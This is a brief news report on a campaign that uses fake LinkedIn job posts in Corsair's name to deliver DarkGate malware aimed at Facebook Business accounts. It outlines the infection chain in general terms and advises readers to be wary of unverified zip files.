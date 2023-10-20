Summary: A Vietnamese cybercriminal ring is using fake LinkedIn posts and direct messages to distribute DarkGate malware to unsuspecting job seekers. The scam uses Corsair’s name to trick victims into downloading a suspicious zip file containing files related to a fake job opening. Once downloaded, the DarkGate malware is executed and attempts to extract sensitive information from the victims’ computer. DarkGate specifically targets Facebook Business accounts, attempting to gain administrator access and launch fraudulent ad campaigns. Users are advised to be cautious with unfamiliar or suspicious-looking posts and direct messages, and to refrain from downloading and opening zip files without verifying their source.

In a recent report Bleeping Computer, it has come to light that cybercriminals are using fake job postings to spread DarkGate malware. These perpetrators from a Vietnamese cybercriminal ring have been targeting LinkedIn users in the United States, United Kingdom, and India, claiming that Corsair, a prominent gaming hardware and accessories company, is hiring a Facebook Ads specialist.

The fake LinkedIn posts and direct messages contain a link to a suspicious URL that appears to be connected to Corsair. However, the link leads unsuspecting job applicants to a zip file named “Salary and new products.8.2.1.zip,” hosted on Dropbox or Google Drive. Inside the zip file are files such as a job description document, a salary and new products text file, and a salary and products PDF.

Upon inspecting the archive, security researchers at WithSecure discovered a VBS script that copies the Windows binary curl.exe to a different location and renames it. This renamed file then connects to an external site to download the autoit3.exe and autoit3 script. The executed script deploys the DarkGate malware, which is designed to extract sensitive information from its targets.

DarkGate, a sibling malware to the previously identified Ducktail, has a specialized component that specifically targets Facebook Business accounts. It attempts to gain access to a Facebook Business account locating and adding the attacker to the account as an administrator. Moreover, it even has the functionality to create and publish fraudulent ad campaigns on the compromised device.

To avoid falling victim to this scam, it is advised that users exercise caution when dealing with unfamiliar or suspicious-looking posts and direct messages. It is important not to download and open zip files without verifying their source. Relying solely on antivirus software may not always be enough to protect against such attacks.

